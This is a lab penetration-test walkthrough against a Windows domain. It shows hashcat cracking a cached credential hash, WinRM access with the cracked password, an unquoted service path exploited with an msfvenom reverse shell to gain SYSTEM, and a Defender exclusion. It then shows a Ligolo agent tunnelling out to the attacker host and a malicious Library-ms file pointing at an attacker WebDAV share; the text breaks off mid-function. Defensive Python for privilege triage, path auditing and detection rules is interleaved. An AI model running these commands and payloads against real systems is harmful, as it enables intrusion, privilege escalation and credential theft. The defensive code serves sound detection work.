Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344390
* Bytes.....: 139921596
* Keyspace..: 14344390

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$DCC2$10240#betty#5fc7ac829477877edf8a44a2f205b383:pinky.1995
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 2100 (Domain Cached Credentials 2 (DCC2), MS Cache 2)
Hash.Target......: $DCC2$10240#betty#5fc7ac829477877edf8a44a2f205b383
Time.Started.....: Fri Feb  7 03:09:01 2025 (1 min, 14 secs)
Time.Estimated...: Fri Feb  7 03:10:15 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     8157 H/s (6.15ms) @ Accel:256 Loops:512 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 601088/14344390 (4.19%)
Rejected.........: 0/601088 (0.00%)
Restore.Point....: 600064/14344390 (4.18%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9728-10239
Candidate.Engine.: Device Generator
Candidates.#1....: pliego -> pimp555
Hardware.Mon.#1..: Util: 94%

Started: Fri Feb  7 03:09:00 2025
Stopped: Fri Feb  7 03:10:16 2025

DMZ01 Attacks

1. Successfully Authenticated to DMZ01 as Betty via WinRM

┌──(kali㉿kali)-[~]
└─$ nxc winrm 10.10.14.60 -u 'betty' -p 'pinky.1995'
WINRM       10.10.14.60     5985   DMZ01            [*] 10.0 Build 26100 (name:DMZ01) (domain:AD.LAB)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.14.60     5985   DMZ01            [+] AD.LAB\betty:pinky.1995 (Pwn3d!)

2. Opened an Evil-WinRM Shell as Betty

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.14.60 -u 'betty' -p 'pinky.1995'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

3. Confirmed Privileges and Group Membership

*Evil-WinRM* PS C:\Users\betty\Documents> whoami /priv; whoami /groups

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
======================================= ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users        Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192
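
Both `whoami /priv` listings on this page, step 14 on WEB02 and step 3 here on DMZ01, are the quickest triage of what a compromised account can do: `SeImpersonatePrivilege` is what step 15 turned into SYSTEM, and a privilege shown as Disabled is still held by the token and can be enabled by its own process. The parser below is an added example, not the lab's code; its two inputs are constructed copies of those two listings and the high-risk set is my selection. Note that members of `NT AUTHORITY\SERVICE`, which includes the SQL Server service, receive `SeImpersonatePrivilege` by default, so for the mssqlserver token the finding points at the execution path (SQLi into `xp_cmdshell`) rather than at the privilege assignment.

```python
import re

# Privileges that let a process holding them reach SYSTEM or other users' memory
# (my selection; Disabled entries count because the holder can enable them itself).
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeTcbPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege", "SeCreateTokenPrivilege",
}

# A table row: privilege name, free-text description, then the state in the last column.
_ROW = re.compile(r"^(Se\w+)\s+.*?\s+(Enabled|Disabled)$")

# Constructed copy of the step 14 listing (WEB02, nt service\mssqlserver).
MSSQLSERVER_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# Constructed copy of the step 3 listing (DMZ01, ad.lab\betty).
BETTY_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled
"""


def parse_whoami_priv(text):
    """Map privilege name -> 'Enabled'/'Disabled' from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def risky_privileges(text):
    """Sorted high-risk privileges present in the token, whatever their state."""
    return sorted(p for p in parse_whoami_priv(text) if p in HIGH_RISK)


def triage(listings):
    """{account: [risky privileges]} over several listings, e.g. collected fleet-wide."""
    return {account: risky_privileges(text) for account, text in listings.items()}


if __name__ == "__main__":
    report = triage({"WEB02 nt service\\mssqlserver": MSSQLSERVER_PRIV,
                     "DMZ01 ad.lab\\betty": BETTY_PRIV})
    for account, privs in report.items():
        print(f"{account}: {', '.join(privs) or 'none'}")
```

Run over the two listings, the mssqlserver token reports `SeAssignPrimaryTokenPrivilege` and `SeImpersonatePrivilege` while Betty's reports nothing, which is consistent with what happened next on each host: a token-impersonation escalation on WEB02, and a file-system misconfiguration (the unquoted service path) rather than a privilege on DMZ01.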

4. Enumerated Unquoted Service Paths

*Evil-WinRM* PS C:\Users\betty\Documents> Get-ChildItem HKLM:\System\CurrentControlSet\Services | % { $p=(Get-ItemProperty $_.PSPath -ea SilentlyContinue).ImagePath; if($p -and $p -like "* *" -and $p -notmatch '^".*"$'){ "Unquoted path: $($_.PSChildName) => $p"}} | findstr BetaService
Unquoted path: BetaService => C:\MyApp\Beta Program\betaservice.exe
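
The one-liner above reports ImagePath values that contain a space and are not wrapped in quotes. The reason that matters is how CreateProcess resolves such a string: it tries each space-delimited prefix with `.exe` appended before it reaches the real executable, so every directory along the way that a standard user can write to is a SYSTEM-level foothold. The function below is an added example rather than the lab's code: it reproduces that resolution order for an ImagePath so that the exact files and directories needing an ACL check can be listed. The BetaService path is the one reported above; the other sample paths are constructed.

```python
def service_path_candidates(image_path):
    """
    Executables CreateProcess may try, in order, for a service ImagePath.
    A quoted path resolves unambiguously and returns []; a path without
    spaces resolves to itself. Trailing arguments are ignored because
    resolution stops at the first token that ends in .exe.
    """
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    if " " not in image_path:
        return [image_path]
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates


def audit_image_paths(services):
    """{service: candidates} for every ImagePath that can resolve to more than one file."""
    report = {}
    for name, image_path in services.items():
        candidates = service_path_candidates(image_path)
        if len(candidates) > 1:
            report[name] = candidates
    return report


# BetaService as reported by the enumeration above; the other three are constructed.
SAMPLE_SERVICES = {
    "BetaService": r"C:\MyApp\Beta Program\betaservice.exe",
    "GoodQuoted": r'"C:\Program Files\Good App\goodsvc.exe" -k net',
    "NoSpace": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
    "DeepUnquoted": r"C:\Program Files\Vendor Name\Tool Suite\svc.exe --port 8080",
}

if __name__ == "__main__":
    for name, candidates in audit_image_paths(SAMPLE_SERVICES).items():
        print(f"{name}:")
        for path in candidates:
            print(f"    {path}")
```

For BetaService the list is `C:\MyApp\Beta.exe` followed by the real binary, which is exactly the file name dropped in step 8. The remediation is to store the path quoted, for example `sc config BetaService binPath= "\"C:\MyApp\Beta Program\betaservice.exe\""` (the escaped inner quotes are what make the stored value quoted), and to confirm with `icacls` that no directory on the candidate list grants write or create-file rights to Users or Authenticated Users.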

5. Created a reverse shell

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f exe -o payload443.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: /home/kali/payload443.exe

6. Confirmed the Python3 HTTP Server is still Running

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

7. Navigated to the Parent Directory of the Vulnerable Service's Executable Path and Uploaded the Reverse Shell Binary as “Beta.exe”

*Evil-WinRM* PS C:\Users\betty\Documents> cd C:\MyApps\

8. Uploaded the Reverse Shell Executable to the Vulnerable Path

*Evil-WinRM* PS C:\MyApps> upload payload443.exe Beta.exe
Info: Uploading /home/kali/payload443.exe to C:\MyApps\Beta.exe

Data: 9556 bytes of 9556 bytes copied

9. Spawned a Reverse Shell as SYSTEM

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.60] 49810
Microsoft Windows [Version 10.0.26100.2894]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami
whoami
nt authority\system

10. Enumerated Logged-On Domain Users

C:\Windows\System32> dir C:\Users\
dir C:\Users\
 Volume in drive C has no label.
 Volume Serial Number is D637-439E

 Directory of C:\Users

02/14/2025  08:38 PM    DIR          .
02/14/2025  08:38 PM    DIR          Administrator
02/14/2025  08:37 PM    DIR          betty
02/14/2025  08:38 PM    DIR          chris
02/14/2025  01:25 PM    DIR          LocalUser
02/14/2025  01:23 PM    DIR          Public
               0 File(s)              0 bytes
               6 Dir(s)  42,891,587,584 bytes free

11. Read the PowerShell History for Chris and discovered a command sending an email to daniela@ad.lab

C:\Windows\System32> type C:\Users\Chris\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Chris\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
New-Item -Path "C:\MyApps\Beta Program" -ItemType Directory
Add-MpPreference -ExclusionPath "C:\MyApps"
cd "C:\MyApps\Beta Program\"
notepad betaservice.ps1
.\betaservice.ps1
powershell -ep bypass
.\betaservice.ps1
dir
shutdown /s /t 0
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\BetaService" -Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\BetaService" -Name ImagePath -Value 'C:\MyApp\Beta Program\betaservice.exe'
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\BetaService" -Name ImagePath
reg query "HKLM\SYSTEM\CurrentControlSet\Services\BetaService" /v ImagePath
shutdown /s /t 0
sc.exe create BetaService binPath= "C:\MyApps\Beta Program\betaservice.exe" type= own start= auto
Get-CimInstance -ClassName Win32_Service | Where-Object Name -eq "BetaService"
Get-Service BetaService
schtasks /create /tn "RunBetaServiceEveryMinute" /sc minute /mo 1 /tr "powershell -NoProfile -ExecutionPolicy Bypass -Command Restart-Service BetaService" /ru "NT AUTHORITY\SYSTEM" /f
schtasks /create /tn "StartBetaServiceOnBoot" /sc onstart /tr "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Restart-Service BetaService" /ru "NT AUTHORITY\SYSTEM" /f
shutdown /s /t 0
Send-MailMessage -SmtpServer "MAIL01" -From "administrator@ad.lab" -To "daniela@ad.lab" -Subject "Test SMTP Relay" -Body "Hello from Windows Server SMTP!"
shutdown /s /t 0
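
Chris's history reads like a checklist of the commands a process-creation audit (Windows event 4688 with command-line logging, or Sysmon event 1) should flag, and the `reg.exe save hklm\sam` run in step 19 belongs on the same list. The detector below is an added example, not a product rule set: it runs a few command-line patterns over constructed process-creation events whose command lines are copied from this page, plus two benign controls to show what does not fire. The `sc.exe create` pattern deserves a note: quotes passed on the command line are stripped before the value is stored, so only an escaped inner quote (`"\"...\""`) results in a quoted ImagePath, and that is what the pattern distinguishes.

```python
import re

# Command-line patterns (my selection) for process-creation events such as 4688 / Sysmon 1.
RULES = [
    ("hive_dump",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    ("defender_exclusion",
     re.compile(r"\bAdd-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.I)),
    ("schtask_as_system",
     re.compile(r'\bschtasks(?:\.exe)?\b.*?/create\b.*?/ru\s+"?NT AUTHORITY\\SYSTEM', re.I)),
    # binPath= "C:\Dir With Space\x.exe" stores an unquoted path; "\"...\"" stores a quoted one.
    ("unquoted_service_create",
     re.compile(r'\bsc(?:\.exe)?\s+create\b.*?binPath=\s*"(?!\\")[^"]*\s[^"]*"', re.I)),
]

# Constructed process-creation events. The first four command lines are taken
# from this page; the last two are benign controls that must not fire.
EVENTS = [
    {"host": "WEB02", "user": r"NT AUTHORITY\SYSTEM",
     "cmd": r"reg.exe save hklm\sam \\10.10.14.10\samba\sam.save"},
    {"host": "DMZ01", "user": r"AD\chris",
     "cmd": r'powershell.exe Add-MpPreference -ExclusionPath "C:\MyApps"'},
    {"host": "DMZ01", "user": r"AD\chris",
     "cmd": r'schtasks /create /tn "RunBetaServiceEveryMinute" /sc minute /mo 1 '
            r'/tr "powershell -NoProfile -ExecutionPolicy Bypass -Command Restart-Service BetaService" '
            r'/ru "NT AUTHORITY\SYSTEM" /f'},
    {"host": "DMZ01", "user": r"AD\chris",
     "cmd": r'sc.exe create BetaService binPath= "C:\MyApps\Beta Program\betaservice.exe" type= own start= auto'},
    {"host": "DMZ01", "user": r"AD\chris",
     "cmd": r'reg query "HKLM\SYSTEM\CurrentControlSet\Services\BetaService" /v ImagePath'},
    {"host": "FS01", "user": r"AD\svcadmin",
     "cmd": r'sc.exe create GoodSvc binPath= "\"C:\Program Files\Good App\good.exe\"" start= auto'},
]


def detect(events):
    """Return one finding per (event, rule) match, in event order."""
    findings = []
    for event in events:
        for name, rx in RULES:
            if rx.search(event["cmd"]):
                findings.append({"host": event["host"], "user": event["user"],
                                 "rule": name, "cmd": event["cmd"]})
    return findings


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(f"[{hit['rule']}] {hit['host']} {hit['user']}: {hit['cmd']}")
```

Each of the four page-derived command lines fires exactly one rule, and the two controls (a `reg query` and a correctly quoted `sc.exe create`) fire none. The Defender exclusion is the one worth paging on: it precedes the tooling drops on both hosts in this writeup (steps 11 and 16), and a legitimate administrator seldom excludes `C:\Users\Public`.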

12. Downloaded and Prepared Ligolo

┌──(kali㉿kali)-[~]
└─$ cd /opt; sudo mkdir -p Pivoting/Ligolo-NG/{Linux/{Proxy,Agent},Windows/{Proxy,Agent}}; cd Pivoting/Ligolo-NG

┌──(kali㉿kali)-[/opt/Pivoting/Ligolo-NG]
└─$ sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_agent_0.5.2_linux_amd64.tar.gz -O Linux/Agent/agent.tar.gz; sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_agent_0.5.2_windows_amd64.zip -O Windows/Agent/agent.zip; sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_proxy_0.5.2_linux_amd64.tar.gz -O Linux/Proxy/proxy.tar.gz; sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_proxy_0.5.2_windows_amd64.zip -O Windows/Proxy/proxy.zip
--2025-02-20 17:42:34--  http://10.10.14.14:8000/ligolo-ng_agent_0.5.2_linux_amd64.tar.gz
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2018731 (1.9M) [application/gzip]
Saving to: ‘Linux/Agent/agent.tar.gz’

Linux/Agent/agent.tar.gz                                                       100%[===================================================================================================================================================================================================>]   1.92M  --.-KB/s    in 0.004s

2025-02-20 17:42:34 (430 MB/s) - ‘Linux/Agent/agent.tar.gz’ saved [2018731/2018731]

--2025-02-20 17:42:34--  http://10.10.14.14:8000/ligolo-ng_agent_0.5.2_windows_amd64.zip
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2070457 (2.0M) [application/zip]
Saving to: ‘Windows/Agent/agent.zip’

Windows/Agent/agent.zip                                                        100%[===================================================================================================================================================================================================>]   1.97M  --.-KB/s    in 0.006s

2025-02-20 17:42:34 (354 MB/s) - ‘Windows/Agent/agent.zip’ saved [2070457/2070457]

--2025-02-20 17:42:34--  http://10.10.14.14:8000/ligolo-ng_proxy_0.5.2_linux_amd64.tar.gz
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4801384 (4.6M) [application/gzip]
Saving to: ‘Linux/Proxy/proxy.tar.gz’

Linux/Proxy/proxy.tar.gz                                                       100%[===================================================================================================================================================================================================>]   4.58M  --.-KB/s    in 0.01s

2025-02-20 17:42:34 (431 MB/s) - ‘Linux/Proxy/proxy.tar.gz’ saved [4801384/4801384]

--2025-02-20 17:42:34--  http://10.10.14.14:8000/ligolo-ng_proxy_0.5.2_windows_amd64.zip
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4821614 (4.6M) [application/zip]
Saving to: ‘Windows/Proxy/proxy.zip’

Windows/Proxy/proxy.zip                                                        100%[===================================================================================================================================================================================================>]   4.60M  --.-KB/s    in 0.01s

2025-02-20 17:42:34 (358 MB/s) - ‘Windows/Proxy/proxy.zip’ saved [4821614/4821614]


┌──(kali㉿kali)-[/opt/Pivoting/Ligolo-NG]
└─$ sudo find . -name '*.tar.gz' -execdir tar -xzvf "{}" \; -execdir find . ! -executable -delete \;
LICENSE
README.md
proxy
LICENSE
README.md
agent

┌──(kali㉿kali)-[/opt/Pivoting/Ligolo-NG]
└─$ sudo find . -name '*.zip' -execdir unzip "{}" \; -execdir find . -type f ! -name "*.exe" -delete \;
Archive:  ./proxy.zip
  inflating: LICENSE
  inflating: README.md
  inflating: proxy.exe
Archive:  ./agent.zip
  inflating: LICENSE
  inflating: README.md
  inflating: agent.exe

┌──(kali㉿kali)-[/opt/Pivoting/Ligolo-NG]
└─$ mkdir ~/ligolo; cd ~/ligolo; cp /opt/Pivoting/Ligolo-NG/Linux/Proxy/proxy /opt/Pivoting/Ligolo-NG/Windows/Agent/agent.exe .

13. Started a Python3 HTTP Server to serve Ligolo Agent

┌──(kali㉿kali)-[~/ligolo]
└─$ python3 -m http.server 8001
Serving HTTP on 0.0.0.0 port 8001 (http://0.0.0.0:8001/) ...

14. Added an IP interface in Kali, for the Ligolo Server

┌──(kali㉿kali)-[~/ligolo]
└─$ sudo ip tuntap add user kali mode tun ligolo; sudo ip link set ligolo up; sudo ip route add 10.10.14.0/24 dev ligolo
[sudo] password for kali:
RTNETLINK answers: File exists

15. Started the Ligolo Server

┌──(kali㉿kali)-[~/ligolo]
└─$ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
    __    _
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ / __ \/ / __ \______/ __ \/ __ /
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!

16. Added a Windows Defender Exclusion to Allow for Download of Ligolo Agent

C:\Windows\system32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Add-MpPreference -ExclusionPath "C:\Users\Public"
Add-MpPreference -ExclusionPath "C:\Users\Public"

17. Downloaded Ligolo Agent to C:\Users\Public

PS C:\Windows\system32> wget http://10.10.14.10:8001/agent.exe -O C:\Users\Public\agent.exe
wget http://10.10.14.10:8001/agent.exe -O agent.exe

18. Launched the Ligolo Agent

PS C:\Windows\system32> cd C:\Users\Public
PS C:\Users\Public> .\agent.exe -connect 10.10.14.10:11601 -ignore-cert
.\agent.exe -connect 10.10.14.10:11601 -ignore-cert
time="2025-02-07T23:52:51-08:00" level=warning msg="warning, certificate validation disabled"
time="2025-02-07T23:52:51-08:00" level=info msg="Connection established" addr="10.10.14.10:11601"

19. Started the Ligolo Tunnel

ligolo-ng » INFO[0075] Agent joined.                                 name="NT AUTHORITY\\SYSTEM@DMZ01" remote="10.10.14.60:55594"

ligolo-ng » session

? Specify a session : 1 - #1 - NT AUTHORITY\SYSTEM@DMZ01 - 10.10.14.60:55594

[Agent : NT AUTHORITY\SYSTEM@DMZ01] » start
[Agent : NT AUTHORITY\SYSTEM@DMZ01] » INFO[0081] Starting tunnel to NT AUTHORITY\SYSTEM@DMZ01

MAIL01 Attacks

1. Created and activated a Python virtual environment

┌──(kali㉿kali)-[~]
└─$ cd ~

┌──(kali㉿kali)-[~]
└─$ python3 -m venv ~/wsgidav-venv

┌──(kali㉿kali)-[~]
└─$ source ~/wsgidav-venv/bin/activate

2. Installed WsgiDAV, Cheroot and lxml

┌──(wsgidav-venv)─(kali㉿kali)-[~]
└─$ pip install wsgidav cheroot lxml
Collecting wsgidav
  Downloading WsgiDAV-4.3.3-py3-none-any.whl.metadata (7.0 kB)
Collecting defusedxml (from wsgidav)
  Downloading defusedxml-0.7.1-py2.py3-none-any.whl.metadata (32 kB)
Collecting Jinja2 (from wsgidav)
  Downloading jinja2-3.1.5-py3-none-any.whl.metadata (2.6 kB)
Collecting json5 (from wsgidav)
  Downloading json5-0.10.0-py3-none-any.whl.metadata (34 kB)
Collecting PyYAML (from wsgidav)
  Downloading PyYAML-6.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (2.1 kB)
Collecting MarkupSafe>=2.0 (from Jinja2->wsgidav)
  Downloading MarkupSafe-3.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (4.0 kB)
Downloading WsgiDAV-4.3.3-py3-none-any.whl (164 kB)
Downloading defusedxml-0.7.1-py2.py3-none-any.whl (25 kB)
Downloading jinja2-3.1.5-py3-none-any.whl (134 kB)
Downloading json5-0.10.0-py3-none-any.whl (34 kB)
Downloading PyYAML-6.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (767 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 767.5/767.5 kB 5.0 MB/s eta 0:00:00
Downloading MarkupSafe-3.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (23 kB)
Installing collected packages: PyYAML, MarkupSafe, json5, defusedxml, Jinja2, wsgidav
Successfully installed Jinja2-3.1.5 MarkupSafe-3.0.2 PyYAML-6.0.2 defusedxml-0.7.1 json5-0.10.0 wsgidav-4.3.3
Collecting cheroot
  Downloading cheroot-10.0.1-py3-none-any.whl.metadata (7.1 kB)
Collecting lxml
  Downloading lxml-5.3.1-cp312-cp312-manylinux_2_28_x86_64.whl.metadata (3.7 kB)
Collecting more-itertools>=2.6 (from cheroot)

  Downloading more_itertools-10.6.0-py3-none-any.whl.metadata (37 kB)
Collecting jaraco.functools (from cheroot)
  Downloading jaraco.functools-4.1.0-py3-none-any.whl.metadata (2.9 kB)
Downloading cheroot-10.0.1-py3-none-any.whl (104 kB)
Downloading lxml-5.3.1-cp312-cp312-manylinux_2_28_x86_64.whl (5.0 MB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 5.0/5.0 MB 3.8 MB/s eta 0:00:00
Downloading more_itertools-10.6.0-py3-none-any.whl (63 kB)
Downloading jaraco.functools-4.1.0-py3-none-any.whl (10 kB)
Installing collected packages: more-itertools, lxml, jaraco.functools, cheroot
Successfully installed cheroot-10.0.1 jaraco.functools-4.1.0 lxml-5.3.1 more-itertools-10.6.0

3. Created the Webdav Root Directory

┌──(wsgidav-venv)─(kali㉿kali)-[~]
└─$ mkdir ~/webdav

4. Launched the WebDAV Server (wsgidav warns that the share is anonymous read-write; fine for the lab, but every host that can reach 10.10.14.10:81 can also write to it)

┌──(wsgidav-venv)─(kali㉿kali)-[~]
└─$ wsgidav --host=0.0.0.0 --port=81 --auth=anonymous --root /home/kali/webdav
Running without configuration file.
02:53:06.480 - WARNING : App wsgidav.mw.cors.Cors(None).is_disabled() returned True: skipping.
02:53:06.481 - INFO    : WsgiDAV/4.3.3 Python/3.12.8 Linux-6.11.2-amd64-x86_64-with-glibc2.40
02:53:06.481 - INFO    : Lock manager:      LockManager(LockStorageDict)
02:53:06.481 - INFO    : Property manager:  None
02:53:06.481 - INFO    : Domain controller: SimpleDomainController()
02:53:06.481 - INFO    : Registered DAV providers by route:
02:53:06.481 - INFO    :   - '/:dir_browser': FilesystemProvider for path '/home/kali/wsgidav-venv/lib/python3.12/site-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)
02:53:06.481 - INFO    :   - '/': FilesystemProvider for path '/home/kali/webdav' (Read-Write) (anonymous)
02:53:06.481 - WARNING : Basic authentication is enabled: It is highly recommended to enable SSL.
02:53:06.481 - WARNING : Share '/' will allow anonymous write access.
02:53:06.481 - WARNING : Share '/:dir_browser' will allow anonymous write access.
02:53:06.511 - INFO    : Running WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.8
02:53:06.511 - INFO    : Serving on http://0.0.0.0:81 ...

5. Created a Windows Library File in the Web Root Directory.

┌──(kali㉿kali)-[~]
└─$ cd /home/kali/webdav

┌──(kali㉿kali)-[~/webdav]
└─$ vim config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://10.10.14.10:81</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
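
Added example, not code from the original notes: a small parser for the .Library-ms format written above. A Library-ms file is plain XML in the http://schemas.microsoft.com/windows/2009/library namespace, and when Explorer opens the library it resolves every <simpleLocation><url>; an http(s) URL there makes the victim talk WebDAV to that host. The same parser validates a crafted file before it is attached to a mail (a mangled tag such as `<isDefaultSaveLocation<true` is rejected by any XML parser, including the one on the target) and, on the defensive side, triages a Library-ms attachment pulled from a mailbox. SAMPLE_LIBRARY_MS is constructed here to mirror config.Library-ms.

```python
"""Parse a Windows .Library-ms file and report the remote locations it points at."""
from __future__ import annotations

import xml.etree.ElementTree as ET
from urllib.parse import urlparse

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# Constructed sample, mirroring the config.Library-ms written for the lab.
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://10.10.14.10:81</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""


def library_locations(xml_text: str | bytes) -> list[str]:
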